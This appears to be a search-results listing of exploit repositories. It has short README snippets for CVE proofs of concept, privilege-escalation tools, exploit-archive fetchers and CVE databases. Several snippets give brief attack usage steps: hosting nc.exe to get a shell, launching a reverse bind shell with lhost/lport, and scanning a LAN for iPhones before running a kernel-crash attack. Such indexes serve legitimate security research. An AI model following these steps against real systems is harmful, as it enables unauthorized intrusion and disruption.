229143 matches found
Linux_Exploit_Suggester
LinuxExploitSuggester Linux Exploit Suggester; based on operating system release number. This program run without arguments will perform a 'uname -r' to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported pat...
CVE-2022-45701
CVE-2022-45701 Arris Router Firmware 9.1.103 - Remote Code Execution RCE Authenticated POC Exploit...
CVE-2022-23131_exp
This repository does not have a README...
CVE-2019-13272-Local-Privilege-Escalation
This repository does not have a README...
Nagios-XI-s-CVE-2023-40931-Exploit
This repository does not have a README...
CVE-2014-6287
CVE-2014-6287 python3 script Usage: 1. Start a local smb service hosting nc.exe 2. Execute exploit script to getshell...
hook
hook PoC Exploit for CVE-2024-32002...
cve-search
cve-search cve-search is a tool to import CVE Common Vulnerabilities and Exposures and CPE Common Platform Enumeration into a MongoDB to facilitate search and processing of CVEs. The main objective of the software is to avoid doing direct and public lookups into the public CVE databases. Local...
CVE-2022-44149
CVE-2022-44149 POC Exploit for CVE-2022-44149...
SecBugs
Security Bugs Full disclosures for CVE ids, proofs of concept, exploits, 0day bugs and so on...
exploit_CVE-2023-0297
This repository does not have a README...
CVE-2019-8781-macOS
CVE-2019-8781 Security Advisory CVE-2019-8781 POC Details The POC elevate the process to root and execute a shell. Exploit environment root@kitploit: - macOS 10.14.6 18G95 Should works on all macOS version that's released before 10.15.0 - SMEP: On - SMAP: Off - Kernel ASLR slide passed to the arg...
CVE-2020-0910
CVE-2020-0910 Working Exploit PoC CVE-2020-0910 - Reverse Bind Shell Tested using Python2.7 To Install: pip install -r requirements.txt To Run: python CVE-2020-0910-POC.py 10.16.1.24 -lhost 10.1.1.1 -lport 4444...
CVE-2023-28121
CVE-2023-28121 WooCommerce Payments: Unauthorized Admin Access Exploit Won't be publishing this one first... thats for sure.. PoC is now published. It was created for educational/research purposes only! Use it at your own risk!...
sploitctl
Description Script to fetch, install, update and search exploit archives from well-known sites like packetstormsecurity.org and exploit-db.com. In the latest version of the Blackarch Linux it has been added to /usr/share/exploits directory. Installation pacman -S sploitctl Usage root@kitploit:...
Metaphor
Metaphor Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd. Link to whitepaper: https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf Twitter: https://twitter.com/HighByte Metaphor's source code is now released! The source include a PoC that generat...
MYSQL-UDF-Exploit
MYSQL-UDF-Exploit MYSQL UDF Exploit...
CVE-2023-29489
CVE-2023-29489 SynixCyberCrimeMY CVE-2023-29489 Scanner By SamuraiMelayu1337 & h4zzzzzz@scc How To Usage ? git clone https://github.com/SynixCyberCrimeMy/CVE-2023-29489 cd CVE-2023-29489 pip3 install -r requirements.txt python3 eksepelot.py Thanks To All SynixCyberCrimeMY Members...
CVE-2018-4407
CVE-2018-4407 IOS/macOS kernel crash Usage: python CVE20184407.py IP/CIDR python CVE-20184407.py 192.168.1.1 python CVE20184407.py 192.168.1.0/24 1. find iphone nmap -sS -p 62078 --open 192.168.1.0/24 2. attack python CVE20184407.py iphoneip...
CVE-2014-0160-HeartBleed
This is the exploit for CVE-2014-0160 from exploitdb. It did not work for me on python3 while solving Valentine on hackthebox, so I have made the necessary changes. I am not the original author of this code...